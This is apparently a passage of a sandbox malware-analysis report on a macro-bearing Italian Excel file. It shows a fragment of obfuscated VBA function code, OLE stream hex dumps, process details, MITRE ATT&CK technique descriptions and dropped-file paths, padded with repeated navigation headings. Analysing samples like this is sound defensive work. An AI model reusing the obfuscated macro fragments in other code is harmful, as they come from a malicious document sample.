esperienzaA = h & U
End Function
Function eriote()
eriote = pHiom
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	118
Entropy:	4.32915524493
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 268

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	268
Entropy:	3.12865032743
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D O C U M E N T O D I T R A S P O R T O . . . . . . . . . . . . . . . . . F o g l i d i l a v o r
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 dc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b2 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	220
Entropy:	3.64969681825
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . H . . . . . . . T . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . Z ? . . . . . @ . . . . Y . . . . . . . . . . . . . . . . . . . . . . V E T T O R E ; B R T S . P . A . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 8c 00 00 00 08 00 00 00 48 00 00 00 12 00 00 00 54 00 00 00 0c 00 00 00 6c 00 00 00 0d 00 00 00 78 00 00 00 13 00 00 00 84 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 28420

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	28420
Entropy:	6.49399582728
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 454

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	454
Entropy:	5.41897951506
Base64 Encoded:	True
Data ASCII:	I D = " { 2 F 2 C 6 4 B F - 5 E 3 3 - 4 F 7 E - 9 6 2 B - D 1 1 3 A A 1 9 7 8 8 A } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 9 4 B B D 3 B C 1 3 B C 1 3 B C 1 3 B C 1 " . . D P B = " E C E E 1 8 4 1 1 8 E 5 1 9 E 5 1 9 E 5 " . . G C = " 8 F
Data Raw:	49 44 3d 22 7b 32 46 32 43 36 34 42 46 2d 35 45 33 33 2d 34 46 37 45 2d 39 36 32 42 2d 44 31 31 33 41 41 31 39 37 38 38 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	104
Entropy:	3.33133492199
Base64 Encoded:	False
Data ASCII:	Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
Data Raw:	51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3138

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3138
Entropy:	4.52314617839
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2014

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2014
Entropy:	3.42400406956
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . ! . . . . s . E . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 252

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	252
Entropy:	1.8302935157
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . e d . . . . . . . . . . . . . . . . s . . . . . . . . . . . . . . . . b i R . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 1601

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	1601
Entropy:	2.20269951636
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 926

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	926
Entropy:	2.47413380681
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 04 01 d9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 562

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	562
Entropy:	6.26356984503
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . . c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:	01 2e b2 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e4 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 0f 08 a0 e7 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Start time:	13:36:23
Start date:	24/01/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x1030000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XSG2363662.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DDF17BCC-E47B-4784-99D4-89162EBE509E

C:\Users\user\AppData\Local\Temp\~DF09A82308E61BD2D4.TMP

C:\Users\user\AppData\Local\Temp\~DF380378EE1DD6AC3F.TMP

Static File Info

General

File Icon

Static OLE Info

General

OLE File "XSG2363662.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Foglio1, Stream Size: 1000

General

VBA Code

VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5189

General

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 268

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 28420

General

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 454

Windows Analysis Report
XSG2363662.xls